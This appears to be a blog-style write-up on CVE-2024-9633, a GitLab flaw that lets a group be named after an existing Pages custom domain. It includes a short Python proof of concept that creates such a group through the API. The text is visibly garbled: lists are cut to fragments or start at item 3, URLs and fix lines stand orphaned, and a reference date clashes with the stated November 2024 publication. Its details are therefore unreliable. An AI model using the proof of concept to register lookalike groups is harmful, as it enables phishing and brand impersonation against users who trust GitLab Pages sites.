CVE-2024-9633 - GitLab Group Name Domain Confusion Attack Detailed

A recently disclosed security vulnerability—CVE-2024-9633—affects multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE). This flaw could let an attacker confuse users by abusing similarities between GitLab group names and existing Pages domains.

If you use GitLab for hosting projects, websites, or documentation, this vulnerability puts your own or your project's trust at risk. In this article, you'll find out:

17.5. up to, but not including, 17.5.2

If you’re running any of the versions above, update immediately.

Official documentation:
🔗 GitLab Security Release: 17.5.2, 17.4.4, and 17.3.7

What’s the Problem? (In Plain English)

Many companies and open-source communities host project websites using GitLab Pages. Each group's website usually gets a subdomain based on its group/project name, like:

https://mygroup.gitlab.io

GitLab is supposed to prevent anyone from creating a group with a name that'd conflict with currently used custom domains. But due to CVE-2024-9633, a malicious actor can:

Use this overlap to confuse users or impersonate legitimate pages.

3. Possibly trick users into visiting a lookalike site, making it easier to carry out phishing or malware attacks.

For example, if there's an existing custom domain like superteam.dev set up via GitLab Pages, this bug may let someone create a group named superteam.dev and deliberately trigger confusion.

`

https://gitlab.com/data-proj.docs.com/fakesite

`

https://data-proj.docs.com.gitlab.io/

Proof-of-Concept Snippet

The exploit itself is low-effort and does not require complex scripting. Here’s a simple walkthrough using the GitLab API:

import requests

GITLAB_URL = "https://gitlab.com/api/v4/groups";
TOKEN = "YOUR_PERSONAL_ACCESS_TOKEN"

group_data = {
    "name": "superteam.dev",
    "path": "superteam.dev",
    "visibility": "public"
}

headers = { "Private-Token": TOKEN }

resp = requests.post(GITLAB_URL, headers=headers, data=group_data)

if resp.status_code == 201:
    print("Group created:", resp.json()['web_url'])
else:
    print("Failed:", resp.status_code, resp.text)

> Note: Actual exploit for confusion or redirect depends on GitLab Pages settings and whether a registry for that domain already exists.

17.5.2 (or any newer release)

Read the official advisory from GitLab:
🔗 CVE-2024-9633 at GitLab Security Portal

For a simple check to see if your instance is affected, run

gitlab-rake gitlab:env:info

Look for the GitLab version in the output.

Warn users about potential lookalike sites.

- Always verify the domain (and TLS certificate) in your browser bar before signing in or entering data on a GitLab Pages site.

References

- GitLab Security Release Notes: 2024-03-14
- CVE Page at NIST NVD
- GitLab Documentation on Groups and Pages

Summary

CVE-2024-9633 is a severe but easily fixed domain confusion bug affecting several recent GitLab versions. It allows anyone to create groups that overlap with existing custom Pages domains, opening the door for phishing and brand impersonation.

Timeline

Published on: 11/14/2024 14:15:19 UTC
Last modified on: 11/15/2024 13:58:08 UTC